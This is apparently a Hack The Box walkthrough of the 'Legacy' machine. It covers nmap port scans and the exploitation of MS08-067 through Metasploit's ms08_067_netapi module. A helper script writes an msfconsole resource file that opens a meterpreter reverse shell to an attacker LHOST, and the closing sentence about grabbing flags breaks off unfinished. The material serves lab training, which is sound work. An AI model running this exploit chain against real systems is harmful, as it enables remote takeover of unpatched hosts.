Note: If following along, this guide assumes that the reader has set up a Kali Linux installation with all default tools, and is connected to the HTB network with the proper OpenVPN configurations.
Step by Step
As always, we'll start with a standard "Widescan" of every TCP port. Two notes on the flags: a bare -o is not a valid nmap output option (normal output is -oN), and -T5 is fast but can drop ports on a laggy VPN link, so if a later step comes up empty, rerun at -T4:
nmap -p- -oN widescan.txt -T5 10.10.10.4
Ports 139 and 445 are open, which means we've got SMB (NetBIOS session service and Microsoft-DS), the native Windows file-sharing protocol. Samba is the Unix implementation; on a Windows host this is the built-in Server service. Not too surprising for a Windows machine. Port 3389 is a little less common, being the port for RDP on Windows. With this, I'll take my found ports and run my Deepscan, with -A for service versions, OS detection and the default scripts:
nmap -p 139,445,3389 -oN deepscan.txt -A 10.10.10.4
There's a lot of information here: the box is running Windows XP, an end-of-life OS with plenty of well-known vulns, and the SMB fingerprint is just as dated (nmap labels it Windows 2000 LAN Manager; this is the Windows SMB server, not Samba). Knowing this, I'll google "Windows 2000 exploit", to which the first result is MS08-067, a stack overflow in the Server service's path-canonicalisation code (netapi32) that is reachable over SMB without credentials. Before firing anything, nmap's smb-vuln-ms08-067 script is a cheap way to confirm the host is unpatched. Luckily enough, there's a Metasploit module, exploit/windows/smb/ms08_067_netapi, that makes exploitation pretty easy. All we do is load the module, set RHOSTS and LHOST, and we get a shell as NT AUTHORITY\SYSTEM, because the Server service itself runs as SYSTEM.
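To make the scan-to-exploit handoff repeatable, here is an added example (my own glue, not code from the original guide) that pulls the open ports out of the widescan's -oN output to build the deepscan command, then writes an msfconsole resource file for the ms08_067_netapi module. The nmap output embedded below is a constructed sample, not a real capture, and the LHOST value 10.10.14.2 is an assumed VPN address: replace it with your own tun0 address.

```sh
#!/bin/sh
# Added example, not part of the original guide. Glue between the nmap
# steps and the Metasploit step of the Legacy write-up.

# Print the open TCP ports from an nmap -oN file as a comma-separated list
# (the format -p expects). Closed/filtered lines are skipped so the deepscan
# and its -A scripts only hit live services.
open_ports() {
    grep -E '^[0-9]+/tcp +open ' "$1" \
        | cut -d/ -f1 \
        | tr '\n' ',' \
        | sed 's/,$//'
}

# Write an msfconsole resource file that does what the guide does by hand:
# load the MS08-067 module, point it at the target, and run it.
#   $1 = RHOSTS (target), $2 = LHOST (our VPN address), $3 = output path
write_msf_rc() {
    cat > "$3" <<EOF
use exploit/windows/smb/ms08_067_netapi
set RHOSTS $1
set LHOST $2
set PAYLOAD windows/meterpreter/reverse_tcp
run
EOF
    printf '%s\n' "$3"
}

# --- constructed sample widescan output (not a real capture) ---------------
SAMPLE_SCAN=$(mktemp)
cat > "$SAMPLE_SCAN" <<'EOF'
Nmap scan report for 10.10.10.4
Host is up (0.035s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE    SERVICE
135/tcp  filtered msrpc
139/tcp  open     netbios-ssn
445/tcp  open     microsoft-ds
3389/tcp open     ms-wbt-server
EOF

TARGET=10.10.10.4
LHOST=${LHOST:-10.10.14.2}   # assumed VPN address; set LHOST=... to override

PORTS=$(open_ports "$SAMPLE_SCAN")
echo "deepscan:       nmap -p $PORTS -oN deepscan.txt -A $TARGET"
echo "ms08-067 check: nmap -p 445 --script smb-vuln-ms08-067 $TARGET"

RC_FILE=$(write_msf_rc "$TARGET" "$LHOST" "${TMPDIR:-/tmp}/legacy.rc")
echo "exploit:        msfconsole -q -r $RC_FILE"
```

Run the script, copy the three printed commands, and the resource file drives msfconsole non-interactively with msfconsole -q -r. Target selection in the module is left on automatic; the filtered 135/tcp line in the sample is there to show that only genuinely open ports make it into the -p list.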
The exploit needed to be run twice, for whatever reason; it just happens that way sometimes.
Since this exploit drops us straight into a SYSTEM shell, no further privilege escalation is required, and our work is done. The last thing to do is grab the flags, which can be done with just
Thanks for reading my guide! I hope it was helpful. There are more Hack the Box guides under the "HTB guides" menu (brilliant design on my part, I know), and some other projects / blog posts if you're interested in learning security like I am.